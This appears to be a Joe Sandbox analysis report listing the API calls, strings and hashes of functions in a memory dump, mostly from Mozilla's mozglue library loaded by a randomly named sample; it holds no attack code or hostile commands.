Part of subcall function 665D35A0: QueryPerformanceFrequency.KERNEL32(?), ref: 665D35FD
Part of subcall function 665D35A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 665D363F
Part of subcall function 665D35A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 665D369F
Part of subcall function 665D35A0: __aulldiv.LIBCMT ref: 665D36E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 665D309F

Part of subcall function 665F5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,665F56EE,?,00000001), ref: 665F5B85
Part of subcall function 665F5B50: EnterCriticalSection.KERNEL32(6665F688,?,?,?,665F56EE,?,00000001), ref: 665F5B90
Part of subcall function 665F5B50: LeaveCriticalSection.KERNEL32(6665F688,?,?,?,665F56EE,?,00000001), ref: 665F5BD8
Part of subcall function 665F5B50: GetTickCount64.KERNEL32 ref: 665F5BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 665D30BE

Part of subcall function 665D30F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 665D3127
Part of subcall function 665D30F0: __aulldiv.LIBCMT ref: 665D3140

Part of subcall function 6660AB2A: __onexit.LIBCMT ref: 6660AB30

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: 1c23e69808f71ebf0fb238b4d97e479a1c6d1e88a4b9980f7d3578b393b00e55
Instruction ID: 16cb10a614cee5959f794e73eda2afe6b4eb957308c499e04b93b8dfdb52b1d7
Opcode Fuzzy Hash: 1c23e69808f71ebf0fb238b4d97e479a1c6d1e88a4b9980f7d3578b393b00e55
Instruction Fuzzy Hash: 87F0F922C2075897CB10DF36AC831A67B63AFEB114F505329E98463051FB3069D487C9

Function 00D93B8C Relevance: 1.3, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(?,?,?,?), ref: 00D93BB7

Memory Dump Source

Source File: 00000009.00000002.2606301405.0000000000D86000.00000040.00000001.01000000.00000009.sdmp, Offset: 00C3C000, based on PE: true

Associated: 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2606301405.0000000000D6C000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2606301405.0000000000E15000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.2606301405.000000000112B000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a00000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 839980736b7c1e9a0d67d42a69378c556c668bfa976a234af1ba18fc709b3130
Instruction ID: a23ebd44d91a427d943884bfb292e465705fdb6faa7bbbfe4e44ccba12c509be
Opcode Fuzzy Hash: 839980736b7c1e9a0d67d42a69378c556c668bfa976a234af1ba18fc709b3130
Instruction Fuzzy Hash: C6E0E2B6304648ABDF10CE8CD884FAB33DDEB88314F288011FA09D7204C234EE109772

Non-executed Functions

Function 665E6C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON

Download Yara Rule

APIs

CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 665E6CCC
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 665E6D11
moz_xmalloc.MOZGLUE(0000000C), ref: 665E6D26

Part of subcall function 665ECA10: malloc.MOZGLUE(?), ref: 665ECA26

memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 665E6D35
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 665E6D53
CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 665E6D73
free.MOZGLUE(00000000), ref: 665E6D80
CertGetNameStringW.CRYPT32 ref: 665E6DC0
moz_xmalloc.MOZGLUE(00000000), ref: 665E6DDC
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 665E6DEB
CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 665E6DFF
CertFreeCertificateContext.CRYPT32(00000000), ref: 665E6E10
CryptMsgClose.CRYPT32(00000000), ref: 665E6E27
CertCloseStore.CRYPT32(00000000,00000000), ref: 665E6E34
CreateFileW.KERNEL32 ref: 665E6EF9
moz_xmalloc.MOZGLUE(00000000), ref: 665E6F7D
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 665E6F8C
memset.VCRUNTIME140(00000002,00000000,00000208), ref: 665E709D
CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 665E7103
free.MOZGLUE(00000000), ref: 665E7153
CloseHandle.KERNEL32(?), ref: 665E7176
__Init_thread_footer.LIBCMT ref: 665E7209
__Init_thread_footer.LIBCMT ref: 665E723A
__Init_thread_footer.LIBCMT ref: 665E726B
__Init_thread_footer.LIBCMT ref: 665E729C
__Init_thread_footer.LIBCMT ref: 665E72DC
__Init_thread_footer.LIBCMT ref: 665E730D
memset.VCRUNTIME140(?,00000000,00000110), ref: 665E73C2
VerSetConditionMask.NTDLL ref: 665E73F3
VerSetConditionMask.NTDLL ref: 665E73FF
VerSetConditionMask.NTDLL ref: 665E7406
VerSetConditionMask.NTDLL ref: 665E740D
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 665E741A
moz_xmalloc.MOZGLUE(?), ref: 665E755A
memset.VCRUNTIME140(00000000,00000000,?), ref: 665E7568
CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 665E7585
_wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 665E7598
free.MOZGLUE(00000000), ref: 665E75AC

Part of subcall function 6660AB89: EnterCriticalSection.KERNEL32(6665E370,?,?,?,665D34DE,6665F6CC,?,?,?,?,?,?,?,665D3284), ref: 6660AB94
Part of subcall function 6660AB89: LeaveCriticalSection.KERNEL32(6665E370,?,665D34DE,6665F6CC,?,?,?,?,?,?,?,665D3284,?,?,665F56F6), ref: 6660ABD1

Strings

SHA256, xrefs: 665E6EC0
wintrust.dll, xrefs: 665E72CD
CryptCATAdminReleaseCatalogContext, xrefs: 665E72C8
(, xrefs: 665E768A

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
API String ID: 3256780453-3980470659
Opcode ID: ca973b325277ca85a9f85b09cadcd5fbb6293c5882a187386caa1898bfa49bad
Instruction ID: 577dad649e1a9963c8ded2bb805e00ced4c3533bd4f3113f38bdbff7b4791a4c
Opcode Fuzzy Hash: ca973b325277ca85a9f85b09cadcd5fbb6293c5882a187386caa1898bfa49bad
Instruction Fuzzy Hash: BF52C7B1D003259BEF21DF65DC86BAA7BBAEF85704F004599E60997241DB70AF80CF91

Function 666355F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(user32,?,6660E1A5), ref: 66635606
LoadLibraryW.KERNEL32(gdi32,?,6660E1A5), ref: 6663560F
GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 66635633
GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6663563D
GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6663566C
GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6663567D
GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 66635696
GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 666356B2
GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 666356CB
GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 666356E4
GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 666356FD
GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 66635716
GetProcAddress.KERNEL32(00000000,FillRect), ref: 6663572F
GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 66635748
GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 66635761
GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6663577A
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 66635793
GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 666357A8
GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 666357BD
GetProcAddress.KERNEL32(?,StretchDIBits), ref: 666357D5
GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 666357EA
GetProcAddress.KERNEL32(?,DeleteObject), ref: 666357FF

Strings

SetWindowLongPtrW, xrefs: 666357B7
CreateWindowExW, xrefs: 666356C5
GetMonitorInfoW, xrefs: 666357A2
CreateSolidBrush, xrefs: 666357E4
ReleaseDC, xrefs: 66635742
LoadIconW, xrefs: 6663575B
SetWindowPos, xrefs: 666356F7
user32, xrefs: 66635601
RegisterClassW, xrefs: 666356AC
GetThreadDpiAwarenessContext, xrefs: 6663562D
DeleteObject, xrefs: 666357F9
GetDpiForWindow, xrefs: 66635690
GetWindowDC, xrefs: 66635710
LoadCursorW, xrefs: 66635774
MonitorFromWindow, xrefs: 6663578D
ShowWindow, xrefs: 666356DE
StretchDIBits, xrefs: 666357CC
gdi32, xrefs: 6663560A
GetSystemMetricsForDpi, xrefs: 66635677
AreDpiAwarenessContextsEqual, xrefs: 66635637
EnableNonClientDpiScaling, xrefs: 66635666
FillRect, xrefs: 66635729

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
API String ID: 2238633743-1964193996
Opcode ID: b3e7bb2de12b24d2ae85a9c7fb31d40dc1c724701f115483f2bec33aa50abf47
Instruction ID: 557b0e91b6f1ba2035d930916215a9d7a8f1ae08c824570b0f6f50a94e5a61d5
Opcode Fuzzy Hash: b3e7bb2de12b24d2ae85a9c7fb31d40dc1c724701f115483f2bec33aa50abf47
Instruction Fuzzy Hash: 26516770910373ABDB029F36FD569263AEBABC62817059025AB22F3251EF74C900CF64

Function 6661F070 Relevance: 59.9, APIs: 30, Strings: 4, Instructions: 412threadtimeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6661F09B

Part of subcall function 665F5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,665F56EE,?,00000001), ref: 665F5B85
Part of subcall function 665F5B50: EnterCriticalSection.KERNEL32(6665F688,?,?,?,665F56EE,?,00000001), ref: 665F5B90
Part of subcall function 665F5B50: LeaveCriticalSection.KERNEL32(6665F688,?,?,?,665F56EE,?,00000001), ref: 665F5BD8
Part of subcall function 665F5B50: GetTickCount64.KERNEL32 ref: 665F5BE4

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6661F0AC

Part of subcall function 665F5C50: GetTickCount64.KERNEL32 ref: 665F5D40
Part of subcall function 665F5C50: EnterCriticalSection.KERNEL32(6665F688), ref: 665F5D67

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6661F0BE

Part of subcall function 665F5C50: __aulldiv.LIBCMT ref: 665F5DB4
Part of subcall function 665F5C50: LeaveCriticalSection.KERNEL32(6665F688), ref: 665F5DED

?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6661F155
GetCurrentThreadId.KERNEL32 ref: 6661F1E0
AcquireSRWLockExclusive.KERNEL32(6665F4B8), ref: 6661F1ED
ReleaseSRWLockExclusive.KERNEL32(6665F4B8), ref: 6661F212
GetCurrentThreadId.KERNEL32 ref: 6661F229
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6661F231
?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6661F248
GetCurrentThreadId.KERNEL32 ref: 6661F2AE
AcquireSRWLockExclusive.KERNEL32(6665F4B8), ref: 6661F2BB
ReleaseSRWLockExclusive.KERNEL32(6665F4B8), ref: 6661F2F8

Part of subcall function 6660CBE8: GetCurrentProcess.KERNEL32(?,665D31A7), ref: 6660CBF1
Part of subcall function 6660CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,665D31A7), ref: 6660CBFA

Part of subcall function 66619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,665E4A68), ref: 6661945E
Part of subcall function 66619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 66619470
Part of subcall function 66619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 66619482
Part of subcall function 66619420: __Init_thread_footer.LIBCMT ref: 6661949F

GetCurrentThreadId.KERNEL32 ref: 6661F350
AcquireSRWLockExclusive.KERNEL32(6665F4B8), ref: 6661F35D
ReleaseSRWLockExclusive.KERNEL32(6665F4B8), ref: 6661F381
GetCurrentThreadId.KERNEL32 ref: 6661F398
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6661F3A0
GetCurrentThreadId.KERNEL32 ref: 6661F489
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6661F491

Part of subcall function 666194D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 666194EE
Part of subcall function 666194D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 66619508

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6661F3CF

Part of subcall function 6661F070: GetCurrentThreadId.KERNEL32 ref: 6661F440
Part of subcall function 6661F070: AcquireSRWLockExclusive.KERNEL32(6665F4B8), ref: 6661F44D
Part of subcall function 6661F070: ReleaseSRWLockExclusive.KERNEL32(6665F4B8), ref: 6661F472

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6661F4A8
GetCurrentThreadId.KERNEL32 ref: 6661F559
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6661F561
GetCurrentThreadId.KERNEL32 ref: 6661F577
AcquireSRWLockExclusive.KERNEL32(6665F4B8), ref: 6661F585
ReleaseSRWLockExclusive.KERNEL32(6665F4B8), ref: 6661F5A3

Strings

[D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6661F56A
[I %d/%d] profiler_resume, xrefs: 6661F239
[I %d/%d] profiler_pause_sampling, xrefs: 6661F3A8
[I %d/%d] profiler_resume_sampling, xrefs: 6661F499

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: CurrentExclusiveLock$Thread$AcquireRelease$CriticalSectionTime_getpid$?profiler_time@baseprofiler@mozilla@@getenv$Count64EnterLeaveProcessStampTickV01@@Value@mozilla@@$BaseCounterDurationInit_thread_footerNow@PerformancePlatformQuerySeconds@Stamp@mozilla@@TerminateUtils@mozilla@@V12@___acrt_iob_func__aulldiv__stdio_common_vfprintf
String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
API String ID: 565197838-2840072211
Opcode ID: d50f49b8e853625931fba9b072b743617a071a6c679ea083f7209cfbdf3d8746
Instruction ID: 66743d69116bdec9fe9b55fb51086e443fed156b04e35cf79635e6df5aa4a43b
Opcode Fuzzy Hash: d50f49b8e853625931fba9b072b743617a071a6c679ea083f7209cfbdf3d8746
Instruction Fuzzy Hash: A2D13C359083609FDB00DF7AF91676ABFE7EBC6368F144619EA5593381DB704804CBA2

Function 665E64C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(detoured.dll), ref: 665E64DF
GetModuleHandleW.KERNEL32(_etoured.dll), ref: 665E64F2
GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 665E6505
GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 665E6518
GetModuleHandleW.KERNEL32(user32.dll), ref: 665E652B
memcpy.VCRUNTIME140(?,?,?), ref: 665E671C
GetCurrentProcess.KERNEL32 ref: 665E6724
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 665E672F
GetCurrentProcess.KERNEL32 ref: 665E6759
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 665E6764
VirtualProtect.KERNEL32(?,00000000,?,?), ref: 665E6A80
GetSystemInfo.KERNEL32(?), ref: 665E6ABE
__Init_thread_footer.LIBCMT ref: 665E6AD3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 665E6AE8
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 665E6AF7

Strings

user32.dll, xrefs: 665E6526
_etoured.dll, xrefs: 665E64ED
nvd3d9wrap.dll, xrefs: 665E6500
nvdxgiwrap.dll, xrefs: 665E6513
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 665E6798
detoured.dll, xrefs: 665E64DA

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
API String ID: 487479824-2878602165
Opcode ID: fa9958054742600f0daea51ca6dc58313117d57886ab3bffc1eabfc17d555871
Instruction ID: 6e81f5da047c9604c5a49f320435ba788b3844a097f83f62c46caf090d79dc52
Opcode Fuzzy Hash: fa9958054742600f0daea51ca6dc58313117d57886ab3bffc1eabfc17d555871
Instruction Fuzzy Hash: 0CF1F670D043699FDF20CF26DC4AB9ABBB6AF86354F0441D9DA19A3241D731AE84CF91

Function 6661E2F0 Relevance: 32.0, APIs: 13, Strings: 5, Instructions: 466threadCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?,?,6661E2A6), ref: 6661E35E
?_Xbad_function_call@std@@YAXXZ.MSVCP140(?,?,6661E2A6), ref: 6661E386
GetCurrentThreadId.KERNEL32 ref: 6661E3E4
AcquireSRWLockExclusive.KERNEL32(6665F4B8), ref: 6661E3F1
memset.VCRUNTIME140(?,00000000,?), ref: 6661E4AB
ReleaseSRWLockExclusive.KERNEL32(6665F4B8), ref: 6661E4F5
GetCurrentThreadId.KERNEL32 ref: 6661E577
AcquireSRWLockExclusive.KERNEL32(6665F4B8), ref: 6661E584
ReleaseSRWLockExclusive.KERNEL32(6665F4B8), ref: 6661E5DE
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6661E8A6

Part of subcall function 665DB7A0: ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 665DB7CF
Part of subcall function 665DB7A0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 665DB808

Part of subcall function 6662B800: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00000000,66650FB6,00000000,?,?,6661E69E), ref: 6662B830

memset.VCRUNTIME140(?,00000000,00000000), ref: 6661E6DA

Part of subcall function 6662B8B0: memset.VCRUNTIME140(00000000,00000000,00000000,80000000), ref: 6662B916
Part of subcall function 6662B8B0: free.MOZGLUE(00000000,?,?,80000000), ref: 6662B94A

free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6661E864
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6661E883

Strings

MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6661E826, 6661E850
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6661E777
MOZ_PROFILER_STARTUP, xrefs: 6661E5A1, 6661E5CC, 6661E5FF, 6661E62A
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6661E655
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6661E722, 6661E750, 6661E7A2

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: ExclusiveLockfree$memset$AcquireCurrentReleaseThreadXbad_function_call@std@@$?vprint@PrintfTarget@mozilla@@__stdio_common_vsprintfmemcpy
String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
API String ID: 2698983630-53385798
Opcode ID: b1155794e8242894885319b3fce7d220a29ff0be90c6fabf525931d3ea630a7a
Instruction ID: 579e205fd37e64a58d3285ac2b8e535bdf8b5c951f6828ea1a1bb61e0df11871
Opcode Fuzzy Hash: b1155794e8242894885319b3fce7d220a29ff0be90c6fabf525931d3ea630a7a
Instruction Fuzzy Hash: D602AC70A083459FCB10CF29E881A6ABBF6FFC9304F00452DE99A97741DB30E955CB91

Function 665E7810 Relevance: 21.4, APIs: 12, Strings: 2, Instructions: 372COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6665E744), ref: 665E7885
LeaveCriticalSection.KERNEL32(6665E744), ref: 665E78A5
EnterCriticalSection.KERNEL32(6665E784), ref: 665E78AD
LeaveCriticalSection.KERNEL32(6665E784), ref: 665E78CD
EnterCriticalSection.KERNEL32(6665E7DC), ref: 665E78D4
memset.VCRUNTIME140(?,00000000,00000158), ref: 665E78E9
EnterCriticalSection.KERNEL32(00000000), ref: 665E795D
memset.VCRUNTIME140(?,00000000,00000160), ref: 665E79BB
LeaveCriticalSection.KERNEL32(?), ref: 665E7BBC
memset.VCRUNTIME140(?,00000000,00000158), ref: 665E7C82
LeaveCriticalSection.KERNEL32(6665E7DC), ref: 665E7CD2
memset.VCRUNTIME140(00000000,00000000,00000450), ref: 665E7DAF

Strings

Def, xrefs: 665E789F
Def, xrefs: 665E787F

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: CriticalSection$EnterLeavememset
String ID: Def$Def
API String ID: 759993129-3459886022
Opcode ID: 263ca28e70aae49483e1e95505a107a9ae9adf6e945bd02270cc6aec48e7d9e2
Instruction ID: b526e2f35abdb10ef6db590579f68de4cf00aab4f5070d77910018a351cd36e8
Opcode Fuzzy Hash: 263ca28e70aae49483e1e95505a107a9ae9adf6e945bd02270cc6aec48e7d9e2
Instruction Fuzzy Hash: CE022971E4021A8FDF54CF19D985799B7B6FF88314F1582AAD909A7252E730BE90CF80

Function 66617E10 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 403COMMON

Download Yara Rule

Strings

vef, xrefs: 66618207
data, xrefs: 66618280, 666183E1
schema, xrefs: 666181E3, 66618311
(pre-xul), xrefs: 66617E88
name, xrefs: 66617ECF, 66618335

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: memcpystrlen
String ID: (pre-xul)$data$name$schema$vef
API String ID: 3412268980-1798853036
Opcode ID: 272ebb0d37302c238f484b683c5ad7fc3767d47f4888aa7064982d139e5d17f6
Instruction ID: 38e70aef7172ba010bcdb1a9e012acda4fede9d3cfe1b7bc5fc069785896b8f1
Opcode Fuzzy Hash: 272ebb0d37302c238f484b683c5ad7fc3767d47f4888aa7064982d139e5d17f6
Instruction Fuzzy Hash: 06E16BB1A043448BCB10CF68D84165BFBEABBD5318F158A2DE899D7390DBB0ED458B91

Function 66635FF0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

